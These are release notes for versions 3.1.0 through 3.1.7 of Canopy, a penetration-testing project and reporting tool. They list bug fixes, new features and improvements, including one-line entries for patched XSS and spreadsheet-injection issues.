Release notes for Canopy 3.1

3.1.7

Bug

[CAN-2359] - Tinymce XSS via embed elements CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N Base score 4.8
[CAN-2360] - API sorting doesn't reset existing sorts
[CAN-2364] - Jira authentication fails

3.1.6

Bug

[CAN-2272] - Qualys importer does not wrap examples in pre block
[CAN-2311] - OpenVAS v9 importer error: TypeError: unhashable type: 'dict'
[CAN-2340] - KB import fails with exception when references are present

New Feature

[CAN-2328] - Support for Acunetix scanner

Improvement

[CAN-2358] - Order report findings by title, last

3.1.5

Added Ubuntu 18.04 support.

Bug

[CAN-2238] - SoW Reference column has incorrect formatting
[CAN-2240] - Scope revenue field has incorrect formatting
[CAN-2262] - xlsx export should use primary findings by default
[CAN-2263] - PhaseContact edit dialog incorrect detects modifications upon close
[CAN-2281] - Methodology phase view doesn't show description/guides/references in an obvious way
[CAN-2282] - Filter phases from the project view results in http 500
[CAN-2291] - Tool importer fails when examples contain NUL characters when using postgresql
[CAN-2296] - Some canopy settings are not available via the UI without manual creation from command line

Improvement

[CAN-2294] - Additional cross-reference types in report xml

3.1.4

Bug

[CAN-2236] - Non-admins cannot view message templates when attempting to send emails from phase view when using dummy data

Improvement

[CAN-2237] - Support asset access in message templates

Add email pre processing plugin hook

3.1.3

Security

The following XSS instances were corrected:

  • [CAN-2219] - XSS in project access control dialog
  • XSS via project name in scheduler
  • XSS in custom roles membership list in admin section

Bug


[CAN-1479] - Tinymce editor does not show field errors
[CAN-1848] - Rich text in report tables not displaying
[CAN-1849] - Rich text in report tables not saved in some cases
[CAN-2021] - Report row renderer handles long lines poorly
[CAN-2043] - Breadcrumbs do not handle selection of records duplicated titles
[CAN-2122] - Scheduler modifies records on render resulting in dirty records
[CAN-2141] - Message preview error when formatting does not encapsulate the entire template variable
[CAN-2164] - Authors Autocomplete on report properties doesn't work
[CAN-2189] - XML Postprocessors do not run when mapping xml is generated
[CAN-2200] - Possible bug in email generation when using PR workflow
[CAN-2201] - report.type validation failure leads to general error in the UI
[CAN-2208] - Message template: daily summary includes ignored and group members in default list
[CAN-2209] - nmap importer fails with "add() takes only one argument"
[CAN-2210] - Permissions take too long to propagate to the frontend in certain circumstances
[CAN-2211] - Portals list's primary and selection toolbars visible with selection
[CAN-2213] - Email preview permissions misalignment
[CAN-2218] - DATA_PATH does not get created with fresh installations
[CAN-2220] - Phase uploads with a comma in the name breaks downloading and insertion into findings
[CAN-2225] - User email changes are not reflected in user role slugs
[CAN-2231] - File ID prefixed to downloaded documents


New Feature


[CAN-2206] - Add DRF auth token (re)generation endpoint (/api/accounts/profile/reset_token/)


Task


[CAN-2229] - Upgrade prbac and remove json-field workarounds


Improvement


[CAN-2010] - Clarify custom field field names in admin UI
[CAN-2224] - Message templates should support custom fields
[CAN-2226] - Allow filtering on phase fields from project list
[CAN-2228] - Allow users to close main menu by clicking outside of it

3.1.2

Bug


[CAN-1411] - Comments component lacks mask and error handling
[CAN-1479] - Tinymce editor does not show field erros
[CAN-1480] - Many grids and comboboxes are missing the `emptyText` property
[CAN-1495] - Missing renderers for activity log entries
[CAN-1520] - Incorrect multi character usage of strip()/lstrip()/rstrip()
[CAN-1679] - Tool files that fail to import does not report failure in UI
[CAN-1730] - Reports 'kanban' should sort by report_due_date
[CAN-1805] - Comments endpoint doesn't do sufficient permission checking
[CAN-1854] - PDF generation should be async
[CAN-1889] - Rich text custom fields should always be content fields
[CAN-1904] - UI exception (being investigated)
[CAN-1919] - Unable to Delete Multiple Reference From a Finding
[CAN-1992] - Long project/phase titles push buttons off viewport
[CAN-2030] - Modifying the content/structure of a document template should update the last modified date
[CAN-2044] - Report generation retry doesn't update status on generated reports
[CAN-2132] - Total finding status counts not output in XML
[CAN-2142] - Project creation dialog lists SoWs from all clients when opened from client view
[CAN-2143] - No way to link/unlink findings and assets from asset view
[CAN-2144] - Activity log entry creation fails when adding multiple findings from the KB
[CAN-2148] - RelatedObjectDoesNotExist: UserProfile has no prbac_role.
[CAN-2164] - Authors Autocomplete on report properties doesn't work
[CAN-2175] - Disable DRF web API browser
[CAN-2178] - Exception in scheduler events endpoint
[CAN-2181] - Ticket creation window doesn't handle typing into container combo
[CAN-2195] - "Further Reading" section is not populated when a Nessus finding is inserted
[CAN-2197] - Django doesn't handle certain Oracle connection states
[CAN-2198] - Celery doesn't honour CONN_MAX_AGE


New Feature


[CAN-2184] - DRF token authentication
[CAN-2185] - KB export endpoint
[CAN-2193] - Plugin based DRF endpoints


Task


[CAN-1781] - Get updated scheduler in usable state
[CAN-2172] - Add xml formatter to DRF
[CAN-2199] - Adjust gunicorn and celery settings to reduce baseline resource usage and to cycle workers


Improvement


[CAN-1870] - Standardise on capitalisation throughout Canopy
[CAN-1954] - Schedule project view should show client
[CAN-2072] - Handle missing email templates more gracefully
[CAN-2073] - Custom logic for upgrading data
[CAN-2177] - ical events should be processed by email clients for better calendaring integration

3.1.1

Bug

[CAN-2156] - Add asset window field not visible
[CAN-2161] - Incorrect RPM versioning
[CAN-2164] - Authors Autocomplete on report properties doesn't work
[CAN-2174] - Total days missing from phases / report

New Feature

[CAN-1339] - Auto-increment reference fields

Improvement

[CAN-2162] - Sync xlsx and pdf files for each report to portal
[CAN-2169] - Only admins can give another user access to a project
[CAN-2176] - Display KB ID in KB grids

3.1.0

Back compatibility changes

#TODO

Reports need remapping


Sub-task


[CAN-1782] - Move child blocks by same offset as parents, when parents are moved
[CAN-1783] - Date editing dialogs for projects/phases on scheduler
[CAN-1785] - Validate start/end dates of drag-'n'-dropped project- and phase blocks
[CAN-1786] - Add scheduler refresh button
[CAN-1787] - Visually indicate a resource's availability in the resource's scheduler grid row
[CAN-1788] - "Expand/collapse all" for scheduler grids
[CAN-1790] - Allow all resources to be unscheduled from a scheduled project/phase
[CAN-1796] - Pre-populate start/end dates of new phases/events with the parent's dates
[CAN-1797] - Update phase/schedule entry dates when project dates changed
[CAN-1807] - Lock project/phase date editing after being scheduled
[CAN-1891] - Allow template docx files to be downloaded
[CAN-1907] - Allow admins to create and manage custom roles
[CAN-1912] - Upgrade tinymce to latest
[CAN-1913] - Upgrade DRF atleast 3.5
[CAN-1917] - Selection of PR/QA reviewers per report
[CAN-1983] - Email notification: PR/QA required
[CAN-1984] - Email notification: report generated
[CAN-1985] - Email notification: report QA/PR status update
[CAN-1986] - Email notification: report deadline approaching
[CAN-1987] - Email message: report overdue
[CAN-1988] - Email notification - comments

Epic


[CAN-1843] - Team support
[CAN-1938] - Assessment delivery workflow emails

Bug


[CAN-1366] - Re-auth login screen requires refactoring
[CAN-1806] - User access panel shows 'no-one' for disabled users
[CAN-1822] - /api/messaging/comment/count/ breaks on Oracle DB
[CAN-1855] - Notification's object representations should be generated at notification time
[CAN-1862] - User can be scheduled outside of phase dates
[CAN-1863] - Single day phases can't be scheduled
[CAN-1915] - Creating a user without a role fails without error displayed in UI
[CAN-1929] - Report workflow state changes generate duplicate grants
[CAN-1967] - Django 1.8 only supports cxOracle 5.x and we are installing latest
[CAN-1969] - Build server uses the wrong version of the scheduler for Canopy 3.1 builds
[CAN-1972] - Fix alignment of segmented time scale buttons in scheduler toolbar
[CAN-1973] - Various issues with scheduler's resource view
[CAN-1975] - Oracle compat: get_or_create and update_or_create should not have TextFields in their lookup values
[CAN-1976] - Schedule entry editing fails when triggered from resource view
[CAN-1978] - Scheduler performance: only load scheduler events for the current time period
[CAN-1989] - Admins should not be able to delete built-in custom roles
[CAN-1990] - PR/QA roles listed as custom roles and can be deleted
[CAN-2000] - Template finding ID missing from XML mapping path
[CAN-2008] - Workflows do not initialise on registration
[CAN-2013] - TemplateDocumentContent model has incorrect unique_together constraint
[CAN-2025] - XSS in profile image
[CAN-2026] - XSS in signature image
[CAN-2027] - XSS in login banner
[CAN-2031] - XLSX generation allows Excel functions and macros to be embedded in the generated file
[CAN-2037] - Auto-refresh grids: reports
[CAN-2038] - Auto-refresh grids: sows
[CAN-2050] - Edit Opportunity - description field height issue
[CAN-2056] - Possible emailling permissions bug
[CAN-2057] - Drag and dropped images fail due to invalid checksum saving
[CAN-2060] - Custom fields are mandatory in the UI
[CAN-2063] - Output start and end dates in SoW XML
[CAN-2064] - SoW lead author
[CAN-2066] - SoW templates list includes deleted templates
[CAN-2075] - Phase scope location field save error
[CAN-2079] - Description field is cut off in opportunity edit dialog
[CAN-2080] - Consistency: please change here finding into vulnerability
[CAN-2081] - Company custom fields not displaying in edit dialog
[CAN-2085] - Disabled custom fields not listed in admin section
[CAN-2090] - Email validation error not show in user add/edit form
[CAN-2094] - Chart plugin data mapping
[CAN-2097] - Email preview not working
[CAN-2098] - HttpMethodSerializer doesn't differentiate between listings and individual lookups
[CAN-2100] - EditWindow field change detection inaccurate
[CAN-2105] - UI border on reports
[CAN-2108] - "Reporter" not set for imported findings
[CAN-2110] - Benchmark not generating correctly
[CAN-2115] - Projects not shown for senior analysts
[CAN-2124] - References data missing from generated XML
[CAN-2125] - Sample category charts set incorrect data for category axis
[CAN-2131] - Client icon inconsistent use
[CAN-2136] - Message template migration (canopy/migrations/0066_auto_20180412_1505.py) doesn't handle changes in titles
[CAN-2139] - Notifications icon does not show the number of outstanding icons clearly
[CAN-2140] - Scheduler's team filtering generates exception
[CAN-2145] - collectstatic usage leads to incorrect static files in certain circumstances
[CAN-2151] - Split out KB admin permissions into a separate role
[CAN-2152] - Migrations do not run when upgrading from 3.0.7 to 3.1.0
[CAN-2153] - Report tables have incorrect field types in mapping xml
[CAN-2155] - SoW layout has no border width (spacing/padding)
[CAN-2157] - Re-test phase resets resolved finding status to open
[CAN-2158] - Out of scope flag missing from status list modifier
[CAN-2159] - pyc files are not properly removed/generated during package upgrades

New Feature

[CAN-1388] - Email notifications
[CAN-1598] - Add Canopy status endpoint
[CAN-1601] - Add custom field support for other models
[CAN-1941] - Add message template support
[CAN-1943] - Email sending window
[CAN-1944] - Client message template: assessment scheduled
[CAN-1945] - Client message template: assessment commencement
[CAN-1946] - Preview email templates
[CAN-1947] - Let users pick email recipients from a list of contacts and Canopy users
[CAN-1948] - Support email recipients in To, CC and BCC fields
[CAN-1951] - Client message template - daily update summary
[CAN-1960] - Phase assessment type
[CAN-1971] - Filter scheduler records by teams
[CAN-1995] - Chart data plugin type
[CAN-1996] - Base chart data sets
[CAN-2019] - Client message template - phase (assessment) paused
[CAN-2020] - Client message template - phase (assessment) finished
[CAN-2039] - Auto-refresh findings/assets grids after file import
[CAN-2040] - Auto-refresh grids: findings/assets
[CAN-2089] - SoW classification field
[CAN-2112] - Custom chart requirements for enterprise customer
[CAN-2117] - Add version support to plugin system
[CAN-2128] - Custom category chart to output all ratings for all categories
[CAN-2129] - Asset location field not output in generated XML

Task


[CAN-1386] - Rename companies to clients
[CAN-1597] - Oracle DB compatibility
[CAN-1906] - Remove remaining customisation remnants
[CAN-1968] - Oracle compatibility
[CAN-1974] - Add route to scheduler on main nav
[CAN-1999] - Apache support via a default config and possibly a canopy-setup command
[CAN-2002] - Move from supervisord to systemd
[CAN-2015] - Expose additional django-auth-ldap settings in the canopy config file
[CAN-2016] - Extend canopy-manage setupdb to include more DB management actions
[CAN-2099] - Remove non-scheduler project/phase start/end/report date restrictions
[CAN-2113] - Normalize contact xml output for phasecontacts
[CAN-2146] - Move static files generation to build stage from installation stage

Improvement


[CAN-1352] - Align broken SoW generation with report generation
[CAN-1858] - Scheduler project/phase/user edit windows should allow for changing the colour
[CAN-1859] - Display phase reference in the scheduler project list
[CAN-1860] - Scheduler view improvements
[CAN-1861] - Warn users when assigning a resource to a project/phase older than today
[CAN-1864] - Send ical of schedule to users
[CAN-1865] - Incorporate project state into schedule view
[CAN-1866] - Scheduler time block views
[CAN-1869] - Scheduler styling
[CAN-1877] - Category and attack class filters for findings and KB
[CAN-1878] - Expose KB ID in the UI
[CAN-1880] - Set tech lead to the person who's creating the phase by default
[CAN-1881] - Set report defaults
[CAN-1884] - Hide menu items based on permissions
[CAN-1886] - Order projects by last modified
[CAN-1887] - Set default version on report
[CAN-1890] - Display source of finding in the UI
[CAN-1899] - Flexibility in the canopy installer
[CAN-1916] - Move "User Skills" admin page to a tab under the "Users" page
[CAN-1923] - Review read permissions on users endpoint
[CAN-1927] - Phase and Project status options should include 'pasued' or be user definable
[CAN-1934] - Create a role for the scheduler user
[CAN-1936] - Permissions functions should fail hard on non-existent permissions
[CAN-1937] - Add table truncation and table dropping to setupdb management command
[CAN-1953] - Project/Phase colour or highlight by status
[CAN-1956] - Scheduling a user should warn if the user is already scheduled on the dates requested
[CAN-1977] - Category and access control filters
[CAN-1980] - Mark users are unavailable in the scheduler
[CAN-1981] - Adjust report warning rules
[CAN-1991] - Phase and phase scopes should indicate location of testing
[CAN-1997] - Separate PR and QA reviewer lists on edit report
[CAN-2001] - Category and access control filters for add from KB findings
[CAN-2004] - Report due and overdue thresholds
[CAN-2005] - Report lead_author mandatory and auto-set
[CAN-2009] - Automatically add users who edit a report as an author
[CAN-2012] - Move findings to a tab in the report view
[CAN-2022] - Add support for mapping AD groups to user roles
[CAN-2023] - Add TLS options for outbound connections
[CAN-2035] - Expose User address field in UI and XML output
[CAN-2045] - SoW output per-scope costs
[CAN-2046] - Phase scope location field combo
[CAN-2047] - Phase scope edit window WYSIWYG field height
[CAN-2048] - Cosmetic: Phase Scoped Edit Window - Billable days -> Billable units
[CAN-2051] - SoW set defaults
[CAN-2058] - Include role in versions table
[CAN-2059] - Add latest version field from versions table
[CAN-2067] - SoW model missing dates, references, and lead author fields
[CAN-2068] - Remove "Total Days" field from opportunity read view
[CAN-2069] - Set default status "Open" for SoW and phase scope
[CAN-2071] - Improve generic UI error message
[CAN-2077] - Add support for using different serializers for listings
[CAN-2078] - Opportunities have no account manager set and can't be updated
[CAN-2082] - Usability improvement suggestion for Adding vulnerabilities
[CAN-2084] - Unstyled "New assets" text field
[CAN-2087] - Phase contacts
[CAN-2092] - Customise phase/report export spreadsheet by using user provided template
[CAN-2093] - XLSX filename template
[CAN-2114] - Chart plugin interface refactor
[CAN-2119] - HTML support for template messages (email notifications)
[CAN-2126] - Document custom table cells should differentiate between XHTML and Non-XTHML data
[CAN-2130] - Add localisation configuration for static finding content fields
[CAN-2137] - Set output in report to true by default for manually added examples
[CAN-2149] - TinyMCE improve paste defaults
[CAN-2150] - Phase reference unique constraint should be unique within its associated project